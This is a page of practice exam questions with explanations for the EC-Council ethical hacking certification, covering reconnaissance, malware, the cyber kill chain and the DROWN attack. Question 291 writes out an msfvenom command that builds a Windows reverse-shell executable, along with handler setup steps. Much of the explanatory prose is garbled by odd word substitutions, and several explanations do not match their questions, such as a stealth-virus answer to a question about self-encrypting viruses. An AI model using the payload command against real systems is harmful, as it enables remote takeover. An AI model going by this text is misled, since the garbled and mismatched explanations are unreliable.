ECCouncil 312-50v12 Practice Test - Questions Answers, Page 30
List of questions
Question 291

what is the correct way of using MSFvenom to generate a reverse TCP shellcode for windows? Often one of the most useful (and to the beginner underrated) abilities of Metasploit is the msfpayload module. Multiple payloads can be created with this module and it helps something that can give you a shell in almost any situation. For each of these payloads you can go into msfconsole and select exploit/multi/handler. Run 'set payload' for the relevant payload used and configure all necessary options (LHOST, LPORT, etc). Execute and wait for the payload to be run. For the examples below it's pretty self explanatory but LHOST should be filled in with your IP address (LAN IP if attacking within the network, WAN IP if attacking across the internet), and LPORT should be the port you wish to be connected back on.
Example for Windows:
- msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe
Question 292

which of the following information security controls creates an appealing isolated environment for hackers to prevent them from compromising critical targets while simultaneously gathering information about the hacker?
A honeypot may be a trap that an IT pro lays for a malicious hacker, hoping that they will interact with it during a way that gives useful intelligence. It's one among the oldest security measures in IT, but beware: luring hackers onto your network, even on an isolated system, are often a dangerous game. honeypot may be a good starting place: "A honeypot may be a computer or computing system intended to mimic likely targets of cyberattacks." Often a honeypot are going to be deliberately configured with known vulnerabilities in situation to form a more tempting or obvious target for attackers. A honeypot won't contain production data or participate in legitimate traffic on your network β that's how you'll tell anything happening within it's a results of an attack. If someone's stopping by, they're up to no good.
That definition covers a various array of systems, from bare-bones virtual machines that only offer a couple of vulnerable systems to ornately constructed fake networks spanning multiple servers. and therefore the goals of these who build honeypots can vary widely also , starting from defense thorough to academic research. additionally , there's now an entire marketing category of deception technology that, while not meeting the strict definition of a honeypot, is certainly within the same family. But we'll get thereto during a moment. honeypots aim to permit close analysis of how hackers do their dirty work. The team controlling the honeypot can watch the techniques hackers use to infiltrate systems, escalate privileges, and otherwise run amok through target networks. These sorts of honeypots are found out by security companies, academics, and government agencies looking to look at the threat landscape. Their creators could also be curious about learning what kind of attacks are out there, getting details on how specific sorts of attacks work, or maybe trying to lure a specific hackers within the hopes of tracing the attack back to its source. These systems are often inbuilt fully isolated lab environments, which ensures that any breaches don't end in non-honeypot machines falling prey to attacks.
Production honeypots, on the opposite hand, are usually deployed in proximity to some organization's production infrastructure, though measures are taken to isolate it the maximum amount as possible. These honeypots often serve both as bait to distract hackers who could also be trying to interrupt into that organization's network, keeping them faraway from valuable data or services; they will also function a canary within the coalpit , indicating that attacks are underway and are a minimum of partially succeeding.
Question 293

Consider the following Nmap output:
what command-line parameter could you use to determine the type and version number of the web server?
C:\Users\moi>nmap -h | findstr " -sV" -sV: Probe open ports to determine service/version info
Question 294

what are common files on a web server that can be misconfigured and provide useful Information for a hacker such as verbose error messages?
The php.ini file may be a special file for PHP. it's where you declare changes to your PHP settings.
The server is already configured with standard settings for PHP, which your site will use by default.
Unless you would like to vary one or more settings, there's no got to create or modify a php.ini file. If you'd wish to make any changes to settings, please do so through the MultiPHP INI Editor.
Question 295

infecting a system with malware and using phishing to gain credentials to a system or web application are examples of which phase of the ethical hacking methodology?
This phase having the hacker uses different techniques and tools to realize maximum data from the system. they're β
β’ Password cracking β Methods like Bruteforce, dictionary attack, rule-based attack, rainbow table are used. Bruteforce is trying all combinations of the password. Dictionary attack is trying an inventory of meaningful words until the password matches. Rainbow table takes the hash value of the password and compares with pre-computed hash values until a match is discovered.
β’ Password attacks β Passive attacks like wire sniffing, replay attack. Active online attack like Trojans, keyloggers, hash injection, phishing. Offline attacks like pre-computed hash, distributed network and rainbow. Non electronic attack like shoulder surfing, social engineering and dumpster diving.
Question 296

which type of virus can change its own code and then cipher itself multiple times as it replicates?
A stealth virus may be a sort of virus malware that contains sophisticated means of avoiding detection by antivirus software. After it manages to urge into the now-infected machine a stealth viruses hides itself by continually renaming and moving itself round the disc.
Like other viruses, a stealth virus can take hold of the many parts of one's PC. When taking control of the PC and performing tasks, antivirus programs can detect it, but a stealth virus sees that coming and can rename then copy itself to a special drive or area on the disc, before the antivirus software.
Once moved and renamed a stealth virus will usually replace the detected 'infected' file with a clean file that doesn't trigger anti-virus detection. It's a never-ending game of cat and mouse.
The intelligent architecture of this sort of virus about guarantees it's impossible to completely rid oneself of it once infected. One would need to completely wipe the pc and rebuild it from scratch to completely eradicate the presence of a stealth virus. Using regularly-updated antivirus software can reduce risk, but, as we all know, antivirus software is additionally caught in an endless cycle of finding new threats and protecting against them.
Question 297

You are a penetration tester working to test the user awareness of the employees of the client xyz.
You harvested two employees' emails from some public sources and are creating a client-side backdoor to send it to the employees via email. Which stage of the cyber kill chain are you at?
The adversary analyzes the data collected in the previous stage to identify the vulnerabilities and techniques that can exploit and gain unauthorized access to the target organization. Based on the vulnerabilities identified during analysis, the adversary selects or creates a tailored deliverable malicious payload (remote-access malware weapon) using an exploit and a backdoor to send it to the victim. An adversary may target specific network devices, operating systems, endpoint devices, or even individuals within the organization to carry out their attack. For example, the adversary may send a phishing email to an employee of the target organization, which may include a malicious attachment such as a virus or worm that, when downloaded, installs a backdoor on the system that allows remote access to the adversary. The following are the activities of the adversary: o Identifying appropriate malware payload based on the analysis o Creating a new malware payload or selecting, reusing, modifying the available malware payloads based on the identified vulnerability o Creating a phishing email campaign o Leveraging exploit kits and botnets The Cyber Kill Chain consists of 7 steps: Reconnaissance, weaponization, delivery, exploitation, installation, command and control, and finally, actions on objectives. Below you can find detailed information on each.
1. Reconnaissance: In this step, the attacker/intruder chooses their target. Then they conduct indepth research on this target to identify its vulnerabilities that can be exploited.
2. Weaponization: In this step, the intruder creates a malware weapon like a virus, worm, or such to exploit the target's vulnerabilities. Depending on the target and the purpose of the attacker, this malware can exploit new, undetected vulnerabilities (also known as the zero-day exploits) or focus on a combination of different vulnerabilities.
3. Delivery: This step involves transmitting the weapon to the target. The intruder/attacker can employ different USB drives, e-mail attachments, and websites for this purpose.
4. Exploitation: In this step, the malware starts the action. The program code of the malware is triggered to exploit the target's vulnerability/vulnerabilities.
5. Installation: In this step, the malware installs an access point for the intruder/attacker. This access point is also known as the backdoor.
6. Command and Control: The malware gives the intruder/attacker access to the network/system.
7. Actions on Objective: Once the attacker/intruder gains persistent access, they finally take action to fulfill their purposes, such as encryption for ransom, data exfiltration, or even data destruction.
Question 298

Samuel a security administrator, is assessing the configuration of a web server. He noticed that the server permits SSlv2 connections, and the same private key certificate is used on a different server that allows SSLv2 connections. This vulnerability makes the web server vulnerable to attacks as the SSLv2 server can leak key information.
Which of the following attacks can be performed by exploiting the above vulnerability?
DROWN is a serious vulnerability that affects HTTPS and other services that deem SSL and TLS, someof the essential cryptographic protocols for net security. These protocols allow everyone on the netto browse the net, use email, look on-line, and send instant messages while not third-parties beingable to browse the communication.
DROWN allows attackers to break the encryption and read or steal sensitive communications, as well as passwords, credit card numbers, trade secrets, or financial data. At the time of public disclosure on March 2016, our measurements indicated thirty third of all HTTPS servers were vulnerable to the attack. fortuitously, the vulnerability is much less prevalent currently. As of 2019, SSL Labs estimates that one.2% of HTTPS servers are vulnerable.
What will the attackers gain?
Any communication between users and the server. This typically includes, however isn't limited to, usernames and passwords, credit card numbers, emails, instant messages, and sensitive documents. under some common scenarios, an attacker can also impersonate a secure web site and intercept or change the content the user sees.
Who is vulnerable?
Websites, mail servers, and other TLS-dependent services are in danger for the DROWN attack. At the time of public disclosure, many popular sites were affected. we used Internet-wide scanning to live how many sites are vulnerable:
Operators of vulnerable servers got to take action. there's nothing practical that browsers or endusers will do on their own to protect against this attack.
Is my site vulnerable?
Modern servers and shoppers use the TLS encryption protocol. However, because of misconfigurations, several servers also still support SSLv2, a 1990s-era precursor to TLS. This support did not matter in practice, since no up-to-date clients really use SSLv2. Therefore, despite the fact that SSLv2 is thought to be badly insecure, until now, simply supporting SSLv2 wasn't thought of a security problem, is a clients never used it.
DROWN shows that merely supporting SSLv2 may be a threat to fashionable servers and clients. It modern associate degree attacker to modern fashionable TLS connections between up-to-date clients and servers by sending probes to a server that supports SSLv2 and uses the same private key.
A server is vulnerable to DROWN if:
It allows SSLv2 connections. This is surprisingly common, due to misconfiguration and inappropriate default settings.
Its private key is used on any other serverthat allows SSLv2 connections, even for another protocol.
Many companies reuse the same certificate and key on their web and email servers, for instance. In this case, if the email server supports SSLv2 and the web server does not, an attacker can take advantage of the email server to break
TLS connections to the web server.
How do I protect my server?
To protect against DROWN, server operators need to ensure that their private keys software used anyplace with server computer code that enables SSLv2 connections. This includes net servers, SMTP servers, IMAP and POP servers, and the other software that supports SSL/TLS.
Disabling SSLv2 is difficult and depends on the particular server software. we offer instructions here for many common products:
OpenSSL: OpenSSL may be a science library employed in several server merchandise. For users of OpenSSL, the simplest and recommended solution is to upgrade to a recent OpenSSL version.
OpenSSL 1.0.2 users ought to upgrade to 1.0.2g. OpenSSL 1.0.1 users ought to upgrade to one.0.1s.
Users of older OpenSSL versions ought to upgrade to either one in every of these versions. (Updated March thirteenth, 16:00 UTC) Microsoft IIS (Windows Server): Support for SSLv2 on the server aspect is enabled by default only on the OS versions that correspond to IIS 7.0 and IIS seven.5, particularly Windows scene, Windows Server 2008, Windows seven and Windows Server 2008R2. This support is disabled within the appropriate SSLv2 subkey for 'Server', as outlined in KB245030. albeit users haven't taken the steps to disable SSLv2, the export-grade and 56-bit ciphers that build DROWN possible don't seem to be supported by default.
Network Security Services (NSS): NSS may be a common science library designed into several server merchandise. NSS versions three.13 (released back in 2012) and higher than ought to have SSLv2 disabled by default. (A little variety of users might have enabled SSLv2 manually and can got to take steps to disable it.) Users of older versions ought to upgrade to a more moderen version. we tend to still advocate checking whether or not your non-public secret is exposed elsewhere Other affected software and in operation systems:
Instructions and data for: Apache, Postfix, Nginx, Debian, Red Hat Browsers and other consumers: practical nothing practical that net browsers or different client computer code will do to stop DROWN. only server operators ar ready to take action to guard against the attack.
Question 299

John, a disgruntled ex-employee of an organization, contacted a professional hacker to exploit the organization. In the attack process, the professional hacker Installed a scanner on a machine belonging to one of the vktims and scanned several machines on the same network to Identify vulnerabilities to perform further exploitation. What is the type of vulnerability assessment tool employed by John in the above scenario?
Agent-based scanners reside on a single machine but can scan several machines on the same network.
Network-based scanner
A network-based vulnerability scanner, in simplistic terms, is the process of identifying loopholes on a computer's network or IT assets, which hackers and threat actors can exploit. By implementing this process, one can successfully identify their organization's current risk(s). This is not where the buck stops; one can also verify the effectiveness of your system's security measures while improving internal and external defenses. Through this review, an organization is well equipped to take an extensive inventory of all systems, including operating systems, installed software, security patches, hardware, firewalls, anti-virus software, and much more.
Agent-based scanner Agent-based scanners make use of software scanners on each and every device; the results of the scans are reported back to the central server. Such scanners are well equipped to find and report out on a range of vulnerabilities.
NOTE: This option is not suitable for us, since for it to work, you need to install a special agent on each computer before you start collecting data from them.
Question 300

Clark is a professional hacker. He created and configured multiple domains pointing to the same host to switch quickly between the domains and avoid detection.
Identify the behavior of the adversary In the above scenario.
A proxy server acts as a gateway between you and therefore the internet. It's an intermediary server separating end users from the websites they browse. Proxy servers provide varying levels of functionality, security, and privacy counting on your use case, needs, or company policy.
If you're employing a proxy server, internet traffic flows through the proxy server on its thanks to the address you requested. A proxy server is essentially a computer on the web with its own IP address that your computer knows. once you send an internet request, your request goes to the proxy server first. The proxy server then makes your web request on your behalf, collects the response from the online server, and forwards you the online page data so you'll see the page in your browser.